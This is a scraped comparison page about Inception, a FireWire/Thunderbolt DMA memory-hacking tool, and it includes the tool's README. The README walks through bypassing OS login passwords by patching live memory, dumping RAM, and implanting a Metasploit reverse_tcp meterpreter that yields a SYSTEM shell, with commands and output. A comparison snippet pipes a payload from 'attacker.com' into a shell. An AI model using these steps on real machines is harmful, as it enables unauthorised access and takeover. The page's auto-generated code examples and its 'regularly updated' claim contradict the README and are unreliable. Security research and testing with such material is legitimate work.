Convert Figma logo to code with AI

carmaa logoinception

Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.

1,598
198
1,598
23
View on GitHub

Top Related Projects

RoganDawes's avatar

P4wnP1_aloa

4,195

P4wnP1 A.L.O.A. by MaMe82 is a framework which turns a Rapsberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".

DanMcInerney's avatar

LANs.py

2,612

Inject code and spy on wifi users

samyk's avatar

usbdriveby

1,260

USBdriveby exploits the trust of USB devices by emulating an HID keyboard and mouse, installing a cross-platform firewall-evading backdoor, and rerouting DNS within seconds of plugging it in.

offensive-security's avatar

exploitdb

7,826

The legacy Exploit Database repository - New repo located at https://gitlab.com/exploit-database/exploitdb

Quick Overview

Inception is an open-source tool designed for physical memory manipulation and hacking of running systems. It allows users to perform various operations on live systems, including dumping memory, injecting shellcode, and escalating privileges. The project aims to provide a powerful and flexible framework for security researchers and penetration testers.

Pros

  • Provides a comprehensive set of tools for memory manipulation and system hacking
  • Supports multiple operating systems, including Windows, Linux, and macOS
  • Offers a user-friendly command-line interface for easy operation
  • Regularly updated and maintained by the community

Cons

  • Requires physical access to the target system, limiting its remote usage capabilities
  • Can potentially cause system instability or crashes if used improperly
  • May be detected by some antivirus or security software as a potential threat
  • Requires a good understanding of system internals and memory structures for effective use

Code Examples

# Initialize the Inception object
inception = Inception()

# Dump the physical memory of the target system
inception.dump_physical_memory("memory_dump.bin")

# Inject shellcode into a running process
process_id = 1234
shellcode = b"\x90\x90\x90\x90"  # Example shellcode
inception.inject_shellcode(process_id, shellcode)

# Escalate privileges on the target system
inception.escalate_privileges()

Getting Started

To get started with Inception, follow these steps:

  1. Clone the repository:

    git clone https://github.com/carmaa/inception.git

  2. Install the required dependencies:

    pip install -r requirements.txt

  3. Run Inception with the desired options:

    python inception.py --target <target_system> --operation <operation_name>

For more detailed information and usage instructions, refer to the project's documentation on GitHub.

Competitor Comparisons

RoganDawes logo

P4wnP1_aloa

4,195

P4wnP1 A.L.O.A. by MaMe82 is a framework which turns a Rapsberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".

Pros of P4wnP1_aloa

  • More versatile and feature-rich, supporting multiple attack vectors
  • Active development and community support
  • Designed specifically for Raspberry Pi Zero W, optimizing hardware capabilities

Cons of P4wnP1_aloa

  • Steeper learning curve due to more complex functionality
  • Requires specific hardware (Raspberry Pi Zero W) for optimal performance

Code Comparison

P4wnP1_aloa (JavaScript):

function startHIDScript(scriptPath) {
    return new Promise((resolve, reject) => {
        exec(`P4wnP1_cli hid run ${scriptPath}`, (error, stdout, stderr) => {
            if (error) reject(error);
            else resolve(stdout);
        });
    });
}

Inception (Python):

def write_file(filename, data):
    with open(filename, 'wb') as f:
        f.write(data)
    return True

While both projects focus on penetration testing and security research, P4wnP1_aloa offers a more comprehensive toolkit specifically tailored for the Raspberry Pi Zero W. It provides a wider range of attack vectors and features, making it suitable for advanced users and complex scenarios. However, this comes at the cost of a steeper learning curve and hardware specificity.

Inception, on the other hand, is more focused on memory dumping and analysis, with a simpler codebase and potentially easier entry point for beginners. The code comparison highlights the different approaches: P4wnP1_aloa uses JavaScript for scripting HID attacks, while Inception employs Python for file operations related to memory dumping.

DanMcInerney logo

LANs.py

2,612

Inject code and spy on wifi users

Pros of LANs.py

  • More focused on network scanning and reconnaissance
  • Includes features for ARP spoofing and DNS spoofing
  • Actively maintained with recent updates

Cons of LANs.py

  • Less comprehensive in terms of memory manipulation
  • Primarily focused on network-level attacks rather than system-level exploitation
  • May require additional tools for full penetration testing capabilities

Code Comparison

LANs.py:

def start_arp_poison(self, gateway_ip, target_ip):
    self.arp_poison_thread = Thread(target=self.arp_poison, args=(gateway_ip, target_ip))
    self.arp_poison_thread.daemon = True
    self.arp_poison_thread.start()

Inception:

def write_physical_memory(self, address, data):
    bytes_written = c_ulong(0)
    buffer = create_string_buffer(data)
    result = windll.kernel32.WriteProcessMemory(self.h_process, address, buffer, len(data), byref(bytes_written))
    return result

The code snippets highlight the different focus areas of each project. LANs.py emphasizes network-level operations like ARP poisoning, while Inception deals with low-level memory manipulation for system exploitation.

samyk logo

usbdriveby

1,260

USBdriveby exploits the trust of USB devices by emulating an HID keyboard and mouse, installing a cross-platform firewall-evading backdoor, and rerouting DNS within seconds of plugging it in.

Pros of USBdriveby

  • More focused on physical USB-based attacks
  • Includes payload scripts for various operating systems
  • Actively maintained with recent updates

Cons of USBdriveby

  • Limited to USB-based attacks only
  • Requires physical access to the target machine
  • Less comprehensive in terms of overall penetration testing capabilities

Code Comparison

USBdriveby:

# Example payload for macOS
payload = """
tell application "Terminal"
    do script "curl http://attacker.com/payload | sh"
end tell
"""

Inception:

# Example of memory dumping functionality
def dump_physical_memory(self, start, size):
    buf = self.read_physical_memory(start, size)
    return buf

Summary

USBdriveby focuses on USB-based attacks with ready-to-use payloads for different operating systems. It's more specialized but requires physical access to the target. Inception, on the other hand, offers a broader range of memory manipulation techniques and is more suitable for comprehensive penetration testing. USBdriveby is actively maintained, while Inception hasn't seen recent updates. The choice between the two depends on the specific attack scenario and the level of access to the target system.

offensive-security logo

exploitdb

7,826

The legacy Exploit Database repository - New repo located at https://gitlab.com/exploit-database/exploitdb

Pros of ExploitDB

  • Larger and more comprehensive database of exploits
  • Regularly updated with new vulnerabilities and exploits
  • Widely used and recognized in the security community

Cons of ExploitDB

  • Less focused on a specific attack vector compared to Inception
  • May require more filtering to find relevant exploits
  • Potentially overwhelming for beginners due to its vast collection

Code Comparison

Inception (Python):

def attack(self, targets, options):
    for target in targets:
        self.firewire.write(target, options['address'], options['data'])

ExploitDB (Ruby):

def search(text)
  results = []
  @exploits.each do |exploit|
    results << exploit if exploit.match?(text)
  end
  results
end

Summary

ExploitDB is a comprehensive repository of exploits and vulnerabilities, offering a wide range of security-related information. It's regularly updated and widely used in the security community. However, its broad scope may make it less focused on specific attack vectors compared to Inception, which specializes in DMA attacks.

Inception provides a more targeted approach for DMA attacks, while ExploitDB offers a broader collection of exploits. The choice between the two depends on the specific needs of the user and their level of expertise in security research.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Note: This tool is no longer under active development, please look at PCILeech instead.

INCEPTION

Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.

Inception aims to provide a relatively quick, stable, easy and extendable way of performing intrusive and non-intrusive memory hacks against live computers using DMA.

How it works

Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over a IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.

Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.

After running that module you should be able to log into the victim machine using any password.

An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a [memory inception] 1.

Inception is free as in beer and a side project of mine.

Awesome! But why?

The world's forensics experts, governments and three-letter acronym agencies are using [similar tools] 2 already. So if you are a dissident or facing an opressive regime, this tool illustrates why OPSEC is important. Never leave your laptop out of sight.

Caveats

[OS X > 10.7.2] 6 and [Windows > 8.1] 7 disables FireWire DMA when the user has locked the OS and thus prevents inception. The tool will still work while a user is logged on. However, this is a less probable attack scenario IRL.

In addition, [OS X Mavericks > 10.8.2 on Ivy Bridge (>= 2012 Macs)] 8 have enabled VT-D, effectively blocking DMA requests and thwarting all inception modules even when the user is logged in. Look for vtd[0] fault entries in your log/console.

Even though these two caveats gradually will reduce the number of scenarios where this tool is useful, as of March 2015 [70 % of machines out there are still vulnerable] 9.

Key data

The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

Requirements

Inception requires:

  • Hardware:
    • Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire interface, either through a native FireWire port, an ExpressCard/PCMCIA expansion port or a Thunderbolt to FireWire adapter.
    • Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port

Linux is currently recommended on the attacker side due to buggy firewire interfaces on OS X. Note that direct ThunderBolt to ThunderBolt does not work, you need a FireWire adapter. Your mileage may vary when attempting to use Thunderbolt on Linux.

  • Software:
    • Python 3
    • git
    • gcc (incl. g++)
    • cmake
    • pip (for automatic resolution of dependencies)
    • [libforensic1394] 3
    • msgpack

Installation

On Debian-based distributions the installation commands can be summarized as (apply sudo as needed if you're not root):

apt-get install git cmake g++ python3 python3-pip

On OS X, you can install the tool requirements with [homebrew] 4:

brew install git cmake python3

After installing the requirements, download and install libforensic1394:

wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz -O - | tar xz
cd libforensic1394-0.2
cmake CMakeLists.txt
make install
cd python
python3 setup.py install

Download and install Inception

git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install

The setup script should be able to install dependencies if you have pip installed.

General usage

  1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
  2. Run Inception

Simply type:

incept [module name]

For a more complete and up-to-date description, please run:

incept -h

or see the [tool home page] 5.

Modules

As of version 0.4.0, Inception has been modularized. The current modules, and their functionality is described below.

For detailed options on usage, run:

incept [module name] -h

Unlock

The unlock module can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered on machine you have physical access to. The module is primarily attended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other (and better) ways to hack a machine that doesn't pack encryption.

The unlock module is stable on machines that has 4 GiB of main memory or less. If your the target has more then that, you need to be lucky in order to find the signatures mapped to a physical memory page frame that the tool can reach.

As of this version, it is able to unlock the following x86 and x64 operating systems:

OSVersionUnlock lock screenEscalate privileges
Windows 88.1Yes (1)Yes (1)
Windows 88.0YesYes
Windows 7SP1YesYes
Windows 7SP0YesYes
Windows VistaSP2YesYes
Windows VistaSP1YesYes
Windows VistaSP0YesYes
Windows XPSP3YesYes
Windows XPSP2YesYes
Windows XPSP1
Windows XPSP0
Mac OS XMavericksYes (1)Yes (1)
Mac OS XMountain LionYes (1)Yes (1)
Mac OS XLionYes (1)Yes (1)
Mac OS XSnow LeopardYesYes
Mac OS XLeopard
UbuntuSaucyYesYes
UbuntuRaringYesYes
UbuntuQuantalYesYes
UbuntuPreciseYesYes
UbuntuOneiricYesYes
UbuntuNattyYesYes
Linux Mint13YesYes
Linux Mint12YesYes
Linux Mint12YesYes

(1): See caveats above.

Other Linux distributions that use PAM-based authentication may also work using the Ubuntu signatures.

The module also effectively enables escalation of privileges, for instance via the runas or sudo -s commands, respectively.

Execution

To unlock, simply type:

incept unlock

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: https://github.com/carmaa/inception | Twitter: @MaartmannMoe

[?] Will potentially write to file. OK? [y/N] y
[*] Available targets (known signatures):

[1] Windows 8 MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7 MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu libpam unlock/privilege escalation
[7] Linux Mint libpam unlock/privilege escalation

[?] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7 MsvpPasswordValidate unlock/privilege escalation
[=============>                                                ]  227 MiB ( 22%)
[*] Signature found at 0xe373312 in page no. 58227
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

Implant

The implant module implants a (memory-only) Metasploit payload directly to the volatile memory of the target machine. It integrates with MSF through the msfrpcd daemon that is included in all versions of Metasploit.

The current version only work as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future.

Execution

To use it, start msfrpcd:

msfrpcd -P [password]

Then launch inception in another terminal:

incept implant --msfpw [password] --msfopts [options]

As an example, to create a reverse TCP meterpreter shell from the target machine to your attacking host, first start the msfrpcd dameon, and then launch a console listening for callbacks.

msfrpcd -P password
msfconsole

In the console, we configure the receiving end of the payload. We're setting the EXITFUNC option to thread to ensure that the target process stays alive if something should go awry:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.1
set EXITFUNC thread
set ExitOnSession false
exploit -j

Then, in another terminal, we launch Inception:

incept implant --msfpw password --msfopts LHOST=172.16.1.1

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: https://github.com/carmaa/inception | Twitter: @MaartmannMoe

[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================>                             ]  537 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================>                                    ]  434 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

In your MSF console, you should see something similar to this:

msf exploit(handler) > [*] Sending stage (769536 bytes) to 172.16.78.200
[*] Meterpreter session 1 opened (172.16.1.1:4444 -> 172.16.78.200:49178) at 2014-08-30 16:23:31 +0200

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-11FMQRBAMJ6  172.16.1.1:4444 -> 172.16.78.200:49178 (172.16.78.200)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Dump

The dump module facilitates dumping of memory from the target to the attacking host.

Execution

incept dump

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: https://github.com/carmaa/inception | Twitter: @MaartmannMoe

[*] Dumping from 0x0 to 0x40000000, a total of 1 GiB:
[==============================================================] 1024 MiB (100%)
[*] Dumped memory to file memdump_0x0-0x40000000_20140830-174305.bin
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

Known bugs / caveats

Please see the comments at the top and the [tool home page] 5.

Troubleshooting

Please see the [tool home page] 5.

Planned features

  • Reliable implants on x64

  • VT-D bypass

  • Kernel (ring 0) implants

  • More signatures

Development history

  • 0.0.1 - First version, supports basic Windows XP SP3, Vista and 7, Mac OS X and Ubuntu Gnome unlocking

  • 0.0.2 - Added signatures for early XP SP3, and Windows 7 x86 and x64 SP1

  • 0.0.3 - Added some signatures (thanks Tekkenhead) and error handling

  • 0.0.4 - Added businfo to display connected FireWire devices as well as memory dumping capabilities

  • 0.0.5 - Enhanced memory dumping abilities and added samples catalog

  • 0.0.6 - Added unit testing

  • 0.0.7 - Updated Ubuntu signatures and priv. escalation - thanks Adel Khaldi from Algeria

  • 0.0.8 - Fixed Ubuntu unlock and privilege escalation patches - single patch for double the action

  • 0.1.0 - First minor version! Added signatures for OS X and Vista, plus quite a few bug fixes

  • 0.1.1 - Added signatures for Ubuntu 12.04 LTS

  • 0.1.2 - Patched several bugs

  • 0.1.3 - Patched OS X 10.6.8 x64 signature bug

  • 0.1.4 - Added manual mode easing testing of new signatures

  • 0.2.0 - Added signatures for OS X Mountain Lion (10.8) and Windows 8

  • 0.2.1 - Added signatures for Ubuntu 12.10

  • 0.2.2 - Added signatures for Linux Mint

  • 0.2.3 - General code cleanup, and nicer and more consistent output

  • 0.2.4 - Added a progress bar

  • 0.2.5 - No longer needed to be root to run the tool

  • 0.2.6 - Bug fixes

  • 0.3.0 - Added support for Ubuntu 13.04 targets

  • 0.3.1 - Added support for OS X Maverics and Windows 8.1

  • 0.3.2 - Bug fixes and support for Ubuntu 13.10

  • 0.3.3 - Bug fixes regarding output and error handling

  • 0.3.4 - Maestro!

  • 0.3.5 - Added Ubuntu 10.10 and 10.04 x86 signatures

  • 0.4.0 - Complete restructuring and rewrite. Added implant module

  • 0.4.1 - Merged SLOTSCREAMER interface support

  • 0.4.2 - New signatures

Disclaimer

Do no evil with this tool. Also, I am a pentester, not a developer. So if you see weird code that bugs your pythonesque purity senses, drop me a note on how I can improve it. Or even better, fork my code, change it and issue a pull request.